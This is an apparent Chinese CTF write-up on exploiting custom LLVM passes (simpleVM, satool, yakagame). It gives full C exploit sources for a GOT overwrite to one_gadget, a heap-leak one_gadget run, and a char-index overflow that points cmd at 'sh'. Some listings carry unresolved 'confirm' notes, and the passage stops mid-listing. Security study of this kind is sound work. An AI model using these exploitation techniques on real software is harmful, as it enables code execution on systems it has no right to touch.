llvm pass pwn 入门学习
对于没有学习过C++的人来说很不友好,仿佛让我回到学习java的时候(java烂的一批),各种包,函数,实现类,什么迭代器,红黑树什么的,看来抽点时间学习一下c++是有必要的
环境
说实话这个环境搞了两天,老是报 `Error opening 'LLVMHello.so': LLVMHello.so: cannot open shared object file: No such file or directory` 这个错误。解决方法就是加载时给出绝对路径,或者在.bashrc或.zshrc中修改一下环境变量:
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.
一些命令
clang-8 -emit-llvm -S exp.c -o exp.ll 将exp.c编译成中间文件.ll(.so在下一步由opt加载)
./opt-8 -load ./VMPass.so -VMPass ./exp.ll 通过.ll文件进行攻击
set args -load VMPass.so -VMPass exp.ll 在调试时设置一些参数
llvm::Pass::preparePassManager 在开始调试时下的断点
如何搜索pass名称: alt+t 输入 namespace便可以找到
2021红帽杯 simpleVM
程序分析
alt+t找到重写的runOnFunction函数是
sub_6830
这一部分就是用来判断函数的名字是不是o0o0o0o0
进入sub_6AC0这一部分就是用来分析函数的基本块
进入sub_6B80 就是具体分析基本块的供能,并去实现它
这一部分有点长就不再具体分析,主要就是实现一个vm
主要就是llvm::CallBase这个抽象类,了解下面实现的方法就基本上就可以读懂这个程序的流程
Function *getCalledFunction() const: 这个方法用于获取被调用的函数指针。如果函数调用是一个直接调用(CallInst),并且被调用函数是已知的,那么该方法将返回被调用函数的指针;否则,返回nullptr。
bool isIndirectCall() const: 这个方法用于检查函数调用是否是间接调用。如果函数调用是间接调用,那么它的目标函数是在运行时动态决定的,而不是在编译时确定的。
Value *getCalledValue() const: 这个方法用于获取函数调用的被调用值。对于直接调用,该方法返回被调用的函数指针;对于间接调用,返回用于动态计算目标函数的值。
unsigned getNumArgOperands() const: 这个方法用于获取函数调用指令的参数数量。
Value *getArgOperand(unsigned i) const: 这个方法用于获取函数调用指令的第i个参数值。
void setArgOperand(unsigned i, Value *val): 这个方法用于设置函数调用指令的第i个参数值为指定的val。
OperandBundleUse getOperandBundle(StringRef Name) const: 这个方法用于获取函数调用指令中指定名称的操作数束。操作数束是用于传递额外信息的参数组合。
void addOperandBundleUse(OperandBundleUse Bundle): 这个方法用于向函数调用指令添加一个操作数束。
漏洞就是load和store:可以通过这两个函数实现任意地址读写。
漏洞攻击就是修改llvm::legacy::PassManager::~PassManager()的got表。我看好多人都是修改free函数的got表,但是不成功;后来发现winmt师傅的方法可以打通,就是把llvm::legacy::PassManager::~PassManager()的got表改为onegadget。
llvm::legacy::PassManager::~PassManager()
在 llvm::legacy::PassManager
对象的生命周期结束时被自动调用,用于执行清理和释放资源的操作。在对象的销毁过程中,会自动释放该 Pass 管理器对象所拥有的所有 Pass 对象,确保资源正确释放。
调试过程
add(1, 0x77E100);
效果:向寄存器1指定的地址中写入数据
load(1);
效果:将寄存器1中存放的地址的值放到寄存器2中
min(2, 0x9a6d0);
效果:将寄存器2中free函数的真实地址减去0x9a6d0(也就是free在libc中的偏移),得到libc基址
add(2, 0xe3afe);
效果:在libc基址上加偏移,得到onegadget的真实地址。
add(1, 0x870);
0x870是free的got表到llvm::legacy::PassManager::~PassManager()@got.plt的距离
store(1);
效果:将llvm::legacy::PassManager::~PassManager()@got.plt里面的值修改为onegadget
exp
// clang-8 -emit-llvm -S exp.c -o exp.ll
/* Handlers interpreted by VMPass. Only declarations are needed: the pass
 * appears to work on the call instructions themselves (callee name and
 * constant operands, see the CallBase methods above), so no definitions are
 * linked in. Semantics below follow the debugging notes in the text. */
void add(int reg, long long imm);   /* reg += imm */
void min(int reg, long long imm);   /* reg -= imm */
void load(int reg);                 /* read the value at the address held in reg (result lands in reg 2 per the notes) */
void store(int reg);                /* write to the address held in reg (value taken from reg 2 per the notes) */
/* Function the pass looks for by name (sub_6830 checks for "o0o0o0o0").
 * The body is a VM program: register 1 carries an address, register 2 a
 * value. All constants are specific to the challenge's opt-8 and libc. */
void o0o0o0o0()
{
    enum {
        FREE_GOT       = 0x77E100, /* free@got.plt in opt-8 */
        FREE_LIBC_OFF  = 0x9a6d0,  /* free's offset inside libc */
        ONE_GADGET_OFF = 0xe3afe,  /* one_gadget offset inside libc */
        GOT_DELTA      = 0x870     /* free@got.plt -> ~PassManager()@got.plt */
    };

    add(1, FREE_GOT);        /* r1 = &free@got */
    load(1);                 /* r2 = *r1, free's real address */
    min(2, FREE_LIBC_OFF);   /* r2 = libc base */
    add(2, ONE_GADGET_OFF);  /* r2 = one_gadget */
    add(1, GOT_DELTA);       /* r1 = &~PassManager()@got.plt */
    store(1);                /* *r1 = r2 */
}
//./opt-8 -load ./VMPass.so -VMPass ./exp.ll
CISCN-2021 satool
程序分析
还是首先找到重写的runOnFunction。由于是小端序,故函数名应是B4ckDo0r
主要有save,takeaway,stealkey,fakekey,run这几个函数,但只用到了save,stealkey,fakekey,run这几个函数
save
主要效果就是可以申请一个0x20的chunk,需要两个参数
stealkey
效果就是将申请的chunk中的值赋给key
fakekey
效果就是将fakekey的参数和chunk中前八个字节中存放的数相加,并把结果再次写回chunk
run
就是执行chunk中数据
攻击思路
既然有run这个漏洞,我就设法让chunk中出现onegadget
出现了堆,我们就看一下刚开始时bin中情况
可以发现第二次申请chunk时会从unsorted bin中切割,再联想stealkey和fakekey的功能:只要第二次使用save时第一个参数为空,再利用stealkey将chunk中的(main_arena+96)放进key,在fakekey时计算好偏移,即可把一个onegadget写进chunk
exp
/* Handlers of the B4ckDo0r pass; declarations only, the pass interprets the
 * calls. Descriptions follow the analysis above. */
void save(char *a, char *b);   /* allocate a 0x20 chunk from the two arguments */
void stealkey();               /* key <- value stored in the chunk */
void fakekey(long long x);     /* chunk[0..8) <- chunk[0..8) + x */
void run();                    /* execute the chunk contents */
/* Function the pass processes (name is "B4ckDo0r" once the little-endian
 * compare is read back). Offsets are libc-build specific, taken from the
 * write-up: the chunk ends up holding a one_gadget address that run() jumps to. */
void B4ckDo0r()
{
    enum {
        KEY_OFF        = 0x1ecbf0, /* presumably the libc offset of the pointer left in the chunk (main_arena+96 per the text) — confirm */
        ONE_GADGET_OFF = 0xe3afe   /* one_gadget offset inside libc */
    };

    save("trunk", "trunk");            /* first 0x20 chunk */
    save("", "trunk");                 /* second chunk; the empty first argument is what the text relies on */
    stealkey();                        /* key <- chunk contents */
    fakekey(ONE_GADGET_OFF - KEY_OFF); /* chunk <- chunk + delta, i.e. the gadget address */
    run();                             /* execute the chunk */
}
强网杯-2022 yakagame
程序分析
本题重写的runOnFunction函数为sub_C880,PASS名称为ayaka。
分析可得这是一个元神玩家出的题,
fight函数
好像是一个攻击boss的过程:通过比较伤害和boss血量的差来得到score,需要score大于0x12345678。score的赋值语句是 v53 = weaponlist[v54]; *score = v53 - boss; 但显然这是不可能的,因为weaponlist数组是char类型的
merge(无关紧要)
就是将某个武器的伤害加到另一个武器上
destroy(无关紧要)
将选择的武器伤害置零
upgrade(无关紧要)
将所有的武器伤害加上一个数值
4个对cmd的运算
可以对cmd进行加减异或运算,将原本的字符
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66
转换为cat flag的ASCII
else(非常重要)
由于之前没学习过c++ ,这里面使用了红黑树和迭代器混合进行一系列的操作,分析的时候基本不懂,调试老长时间才分析出大概流程(用词表达可能会很不恰当请见谅)
就是它会将不属于上面的所有函数和对应的参数用键值来一一对应,第一次进行配对时无法进入
if ( (std::operator==<char>(v22, v58) & 1) != 0 )
中,只有第二次出现同一个函数名时才会进入,而且weaponlist[v33] = *(_BYTE *)(v24 + 0x20);
中的v24是函数第一次出现时对应的参数,第二次出现的参数没有任何影响。这个赋值有一个漏洞:v33是char类型,并且cmd和score就在weaponlist数组上面,也就是我们可以通过char类型整数溢出来修改score和cmd
exp
其实有两种:一种就是利用它给的四种运算得到cat flag,另一种就是直接修改cmd,让它指向sh。
第一种:直接修改cmd
/* No-op callees. The pass dispatches on the callee name and the call's
 * constant argument (see the "else" branch analysis above), so the bodies
 * are irrelevant; trunk000..trunk255 exist only so the calls below compile. */
void fight(int weapon) {}
void trunk000(int x) {}
void trunk001(int x) {}
void trunk002(int x) {}
void trunk003(int x) {}
void trunk004(int x) {}
void trunk005(int x) {}
void trunk006(int x) {}
void trunk007(int x) {}
void trunk008(int x) {}
void trunk009(int x) {}
void trunk010(int x) {}
void trunk011(int x) {}
void trunk012(int x) {}
void trunk013(int x) {}
void trunk014(int x) {}
void trunk015(int x) {}
void trunk016(int x) {}
void trunk017(int x) {}
void trunk018(int x) {}
void trunk019(int x) {}
void trunk020(int x) {}
void trunk021(int x) {}
void trunk022(int x) {}
void trunk023(int x) {}
void trunk024(int x) {}
void trunk025(int x) {}
void trunk026(int x) {}
void trunk027(int x) {}
void trunk028(int x) {}
void trunk029(int x) {}
void trunk030(int x) {}
void trunk031(int x) {}
void trunk032(int x) {}
void trunk033(int x) {}
void trunk034(int x) {}
void trunk035(int x) {}
void trunk036(int x) {}
void trunk037(int x) {}
void trunk038(int x) {}
void trunk039(int x) {}
void trunk040(int x) {}
void trunk041(int x) {}
void trunk042(int x) {}
void trunk043(int x) {}
void trunk044(int x) {}
void trunk045(int x) {}
void trunk046(int x) {}
void trunk047(int x) {}
void trunk048(int x) {}
void trunk049(int x) {}
void trunk050(int x) {}
void trunk051(int x) {}
void trunk052(int x) {}
void trunk053(int x) {}
void trunk054(int x) {}
void trunk055(int x) {}
void trunk056(int x) {}
void trunk057(int x) {}
void trunk058(int x) {}
void trunk059(int x) {}
void trunk060(int x) {}
void trunk061(int x) {}
void trunk062(int x) {}
void trunk063(int x) {}
void trunk064(int x) {}
void trunk065(int x) {}
void trunk066(int x) {}
void trunk067(int x) {}
void trunk068(int x) {}
void trunk069(int x) {}
void trunk070(int x) {}
void trunk071(int x) {}
void trunk072(int x) {}
void trunk073(int x) {}
void trunk074(int x) {}
void trunk075(int x) {}
void trunk076(int x) {}
void trunk077(int x) {}
void trunk078(int x) {}
void trunk079(int x) {}
void trunk080(int x) {}
void trunk081(int x) {}
void trunk082(int x) {}
void trunk083(int x) {}
void trunk084(int x) {}
void trunk085(int x) {}
void trunk086(int x) {}
void trunk087(int x) {}
void trunk088(int x) {}
void trunk089(int x) {}
void trunk090(int x) {}
void trunk091(int x) {}
void trunk092(int x) {}
void trunk093(int x) {}
void trunk094(int x) {}
void trunk095(int x) {}
void trunk096(int x) {}
void trunk097(int x) {}
void trunk098(int x) {}
void trunk099(int x) {}
void trunk100(int x) {}
void trunk101(int x) {}
void trunk102(int x) {}
void trunk103(int x) {}
void trunk104(int x) {}
void trunk105(int x) {}
void trunk106(int x) {}
void trunk107(int x) {}
void trunk108(int x) {}
void trunk109(int x) {}
void trunk110(int x) {}
void trunk111(int x) {}
void trunk112(int x) {}
void trunk113(int x) {}
void trunk114(int x) {}
void trunk115(int x) {}
void trunk116(int x) {}
void trunk117(int x) {}
void trunk118(int x) {}
void trunk119(int x) {}
void trunk120(int x) {}
void trunk121(int x) {}
void trunk122(int x) {}
void trunk123(int x) {}
void trunk124(int x) {}
void trunk125(int x) {}
void trunk126(int x) {}
void trunk127(int x) {}
void trunk128(int x) {}
void trunk129(int x) {}
void trunk130(int x) {}
void trunk131(int x) {}
void trunk132(int x) {}
void trunk133(int x) {}
void trunk134(int x) {}
void trunk135(int x) {}
void trunk136(int x) {}
void trunk137(int x) {}
void trunk138(int x) {}
void trunk139(int x) {}
void trunk140(int x) {}
void trunk141(int x) {}
void trunk142(int x) {}
void trunk143(int x) {}
void trunk144(int x) {}
void trunk145(int x) {}
void trunk146(int x) {}
void trunk147(int x) {}
void trunk148(int x) {}
void trunk149(int x) {}
void trunk150(int x) {}
void trunk151(int x) {}
void trunk152(int x) {}
void trunk153(int x) {}
void trunk154(int x) {}
void trunk155(int x) {}
void trunk156(int x) {}
void trunk157(int x) {}
void trunk158(int x) {}
void trunk159(int x) {}
void trunk160(int x) {}
void trunk161(int x) {}
void trunk162(int x) {}
void trunk163(int x) {}
void trunk164(int x) {}
void trunk165(int x) {}
void trunk166(int x) {}
void trunk167(int x) {}
void trunk168(int x) {}
void trunk169(int x) {}
void trunk170(int x) {}
void trunk171(int x) {}
void trunk172(int x) {}
void trunk173(int x) {}
void trunk174(int x) {}
void trunk175(int x) {}
void trunk176(int x) {}
void trunk177(int x) {}
void trunk178(int x) {}
void trunk179(int x) {}
void trunk180(int x) {}
void trunk181(int x) {}
void trunk182(int x) {}
void trunk183(int x) {}
void trunk184(int x) {}
void trunk185(int x) {}
void trunk186(int x) {}
void trunk187(int x) {}
void trunk188(int x) {}
void trunk189(int x) {}
void trunk190(int x) {}
void trunk191(int x) {}
void trunk192(int x) {}
void trunk193(int x) {}
void trunk194(int x) {}
void trunk195(int x) {}
void trunk196(int x) {}
void trunk197(int x) {}
void trunk198(int x) {}
void trunk199(int x) {}
void trunk200(int x) {}
void trunk201(int x) {}
void trunk202(int x) {}
void trunk203(int x) {}
void trunk204(int x) {}
void trunk205(int x) {}
void trunk206(int x) {}
void trunk207(int x) {}
void trunk208(int x) {}
void trunk209(int x) {}
void trunk210(int x) {}
void trunk211(int x) {}
void trunk212(int x) {}
void trunk213(int x) {}
void trunk214(int x) {}
void trunk215(int x) {}
void trunk216(int x) {}
void trunk217(int x) {}
void trunk218(int x) {}
void trunk219(int x) {}
void trunk220(int x) {}
void trunk221(int x) {}
void trunk222(int x) {}
void trunk223(int x) {}
void trunk224(int x) {}
void trunk225(int x) {}
void trunk226(int x) {}
void trunk227(int x) {}
void trunk228(int x) {}
void trunk229(int x) {}
void trunk230(int x) {}
void trunk231(int x) {}
void trunk232(int x) {}
void trunk233(int x) {}
void trunk234(int x) {}
void trunk235(int x) {}
void trunk236(int x) {}
void trunk237(int x) {}
void trunk238(int x) {}
void trunk239(int x) {}
void trunk240(int x) {}
void trunk241(int x) {}
void trunk242(int x) {}
void trunk243(int x) {}
void trunk244(int x) {}
void trunk245(int x) {}
void trunk246(int x) {}
void trunk247(int x) {}
void trunk248(int x) {}
void trunk249(int x) {}
void trunk250(int x) {}
void trunk251(int x) {}
void trunk252(int x) {}
void trunk253(int x) {}
void trunk254(int x) {}
void trunk255(int x) {}
/*
 * gamestart: the function the ayaka pass (sub_C880 = runOnFunction) works on;
 * presumably it keys on this exact name — confirm in the pass.
 * Every trunkNNN call goes through the "else" branch described above: the
 * first call with a given name records (name, argument); a second call with
 * the same name writes the *recorded* argument into weaponlist[v33]. v33 is a
 * char and cmd/score sit next to weaponlist, so chosen indices land on them.
 * NOTE(review): the page does not show how the index is derived from the
 * callee name; the layout below assumes trunk232..235 cover cmd and
 * trunk241..244 cover score — confirm in the pass.
 */
void gamestart()
{
// first round: record an argument for every name (only the values recorded
// for the names repeated later matter)
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
// cmd <- 0x6EFDAD (pointer to "sh" per the text above), little-endian bytes
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
// score bytes (0x40 placed via trunk242; the resulting value is not explained on the page)
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
// second round: repeating the names triggers the writes of the values recorded above
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
// fight: runs the score comparison described above
fight(0);
}
第二种:就是将 0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66 经过运算得到 0x63 0x61 0x74 0x20 0x66 0x6C 0x61 0x67
菜鸡打算自己写一个脚本爆破一下,结果发现不行
我看C0Lin师傅使用下面方法得到的
// Sequence of the four cmd operations (C0Lin's solution) that turns the
// original cmd bytes into "cat flag"; the operations are only described above
// as add/sub/xor on cmd, so the exact arithmetic is not reproduced here.
// NOTE(review): these calls do not appear inside the gamestart() listing
// that follows, so they presumably have to be inserted before fight(0) —
// confirm against the original solution.
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
guobapenhuo();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
/* No-op callees. The pass dispatches on the callee name and the call's
 * constant argument, so the bodies are irrelevant. fight, the four cmd
 * operations and upgrade are the handlers described above; trunk000..trunk255
 * exist only so the calls in gamestart compile. */
void fight(int weapon) {}
void wuxiangdeyidao() {}
void zhanjinniuza() {}
void guobapenhuo() {}
void tiandongwanxiang() {}
void upgrade(int val) {}
void trunk000(int x) {}
void trunk001(int x) {}
void trunk002(int x) {}
void trunk003(int x) {}
void trunk004(int x) {}
void trunk005(int x) {}
void trunk006(int x) {}
void trunk007(int x) {}
void trunk008(int x) {}
void trunk009(int x) {}
void trunk010(int x) {}
void trunk011(int x) {}
void trunk012(int x) {}
void trunk013(int x) {}
void trunk014(int x) {}
void trunk015(int x) {}
void trunk016(int x) {}
void trunk017(int x) {}
void trunk018(int x) {}
void trunk019(int x) {}
void trunk020(int x) {}
void trunk021(int x) {}
void trunk022(int x) {}
void trunk023(int x) {}
void trunk024(int x) {}
void trunk025(int x) {}
void trunk026(int x) {}
void trunk027(int x) {}
void trunk028(int x) {}
void trunk029(int x) {}
void trunk030(int x) {}
void trunk031(int x) {}
void trunk032(int x) {}
void trunk033(int x) {}
void trunk034(int x) {}
void trunk035(int x) {}
void trunk036(int x) {}
void trunk037(int x) {}
void trunk038(int x) {}
void trunk039(int x) {}
void trunk040(int x) {}
void trunk041(int x) {}
void trunk042(int x) {}
void trunk043(int x) {}
void trunk044(int x) {}
void trunk045(int x) {}
void trunk046(int x) {}
void trunk047(int x) {}
void trunk048(int x) {}
void trunk049(int x) {}
void trunk050(int x) {}
void trunk051(int x) {}
void trunk052(int x) {}
void trunk053(int x) {}
void trunk054(int x) {}
void trunk055(int x) {}
void trunk056(int x) {}
void trunk057(int x) {}
void trunk058(int x) {}
void trunk059(int x) {}
void trunk060(int x) {}
void trunk061(int x) {}
void trunk062(int x) {}
void trunk063(int x) {}
void trunk064(int x) {}
void trunk065(int x) {}
void trunk066(int x) {}
void trunk067(int x) {}
void trunk068(int x) {}
void trunk069(int x) {}
void trunk070(int x) {}
void trunk071(int x) {}
void trunk072(int x) {}
void trunk073(int x) {}
void trunk074(int x) {}
void trunk075(int x) {}
void trunk076(int x) {}
void trunk077(int x) {}
void trunk078(int x) {}
void trunk079(int x) {}
void trunk080(int x) {}
void trunk081(int x) {}
void trunk082(int x) {}
void trunk083(int x) {}
void trunk084(int x) {}
void trunk085(int x) {}
void trunk086(int x) {}
void trunk087(int x) {}
void trunk088(int x) {}
void trunk089(int x) {}
void trunk090(int x) {}
void trunk091(int x) {}
void trunk092(int x) {}
void trunk093(int x) {}
void trunk094(int x) {}
void trunk095(int x) {}
void trunk096(int x) {}
void trunk097(int x) {}
void trunk098(int x) {}
void trunk099(int x) {}
void trunk100(int x) {}
void trunk101(int x) {}
void trunk102(int x) {}
void trunk103(int x) {}
void trunk104(int x) {}
void trunk105(int x) {}
void trunk106(int x) {}
void trunk107(int x) {}
void trunk108(int x) {}
void trunk109(int x) {}
void trunk110(int x) {}
void trunk111(int x) {}
void trunk112(int x) {}
void trunk113(int x) {}
void trunk114(int x) {}
void trunk115(int x) {}
void trunk116(int x) {}
void trunk117(int x) {}
void trunk118(int x) {}
void trunk119(int x) {}
void trunk120(int x) {}
void trunk121(int x) {}
void trunk122(int x) {}
void trunk123(int x) {}
void trunk124(int x) {}
void trunk125(int x) {}
void trunk126(int x) {}
void trunk127(int x) {}
void trunk128(int x) {}
void trunk129(int x) {}
void trunk130(int x) {}
void trunk131(int x) {}
void trunk132(int x) {}
void trunk133(int x) {}
void trunk134(int x) {}
void trunk135(int x) {}
void trunk136(int x) {}
void trunk137(int x) {}
void trunk138(int x) {}
void trunk139(int x) {}
void trunk140(int x) {}
void trunk141(int x) {}
void trunk142(int x) {}
void trunk143(int x) {}
void trunk144(int x) {}
void trunk145(int x) {}
void trunk146(int x) {}
void trunk147(int x) {}
void trunk148(int x) {}
void trunk149(int x) {}
void trunk150(int x) {}
void trunk151(int x) {}
void trunk152(int x) {}
void trunk153(int x) {}
void trunk154(int x) {}
void trunk155(int x) {}
void trunk156(int x) {}
void trunk157(int x) {}
void trunk158(int x) {}
void trunk159(int x) {}
void trunk160(int x) {}
void trunk161(int x) {}
void trunk162(int x) {}
void trunk163(int x) {}
void trunk164(int x) {}
void trunk165(int x) {}
void trunk166(int x) {}
void trunk167(int x) {}
void trunk168(int x) {}
void trunk169(int x) {}
void trunk170(int x) {}
void trunk171(int x) {}
void trunk172(int x) {}
void trunk173(int x) {}
void trunk174(int x) {}
void trunk175(int x) {}
void trunk176(int x) {}
void trunk177(int x) {}
void trunk178(int x) {}
void trunk179(int x) {}
void trunk180(int x) {}
void trunk181(int x) {}
void trunk182(int x) {}
void trunk183(int x) {}
void trunk184(int x) {}
void trunk185(int x) {}
void trunk186(int x) {}
void trunk187(int x) {}
void trunk188(int x) {}
void trunk189(int x) {}
void trunk190(int x) {}
void trunk191(int x) {}
void trunk192(int x) {}
void trunk193(int x) {}
void trunk194(int x) {}
void trunk195(int x) {}
void trunk196(int x) {}
void trunk197(int x) {}
void trunk198(int x) {}
void trunk199(int x) {}
void trunk200(int x) {}
void trunk201(int x) {}
void trunk202(int x) {}
void trunk203(int x) {}
void trunk204(int x) {}
void trunk205(int x) {}
void trunk206(int x) {}
void trunk207(int x) {}
void trunk208(int x) {}
void trunk209(int x) {}
void trunk210(int x) {}
void trunk211(int x) {}
void trunk212(int x) {}
void trunk213(int x) {}
void trunk214(int x) {}
void trunk215(int x) {}
void trunk216(int x) {}
void trunk217(int x) {}
void trunk218(int x) {}
void trunk219(int x) {}
void trunk220(int x) {}
void trunk221(int x) {}
void trunk222(int x) {}
void trunk223(int x) {}
void trunk224(int x) {}
void trunk225(int x) {}
void trunk226(int x) {}
void trunk227(int x) {}
void trunk228(int x) {}
void trunk229(int x) {}
void trunk230(int x) {}
void trunk231(int x) {}
void trunk232(int x) {}
void trunk233(int x) {}
void trunk234(int x) {}
void trunk235(int x) {}
void trunk236(int x) {}
void trunk237(int x) {}
void trunk238(int x) {}
void trunk239(int x) {}
void trunk240(int x) {}
void trunk241(int x) {}
void trunk242(int x) {}
void trunk243(int x) {}
void trunk244(int x) {}
void trunk245(int x) {}
void trunk246(int x) {}
void trunk247(int x) {}
void trunk248(int x) {}
void trunk249(int x) {}
void trunk250(int x) {}
void trunk251(int x) {}
void trunk252(int x) {}
void trunk253(int x) {}
void trunk254(int x) {}
void trunk255(int x) {}
/*
 * gamestart: the function the ayaka pass (sub_C880 = runOnFunction) works on;
 * presumably it keys on this exact name — confirm in the pass.
 * Every trunkNNN call goes through the "else" branch described above: the
 * first call with a given name records (name, argument); a second call with
 * the same name writes the *recorded* argument into weaponlist[v33]. v33 is a
 * char and cmd/score sit next to weaponlist, so chosen indices land on them.
 * This is the "second method" variant: cmd is meant to be turned into
 * "cat flag" by the four operations listed above, which are NOT part of this
 * listing — only score is written here.
 * NOTE(review): the page does not show how the index is derived from the
 * callee name; the layout below assumes trunk241..244 cover score — confirm.
 */
void gamestart()
{
// first round: record an argument for every name (only the values recorded
// for the names repeated later matter)
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
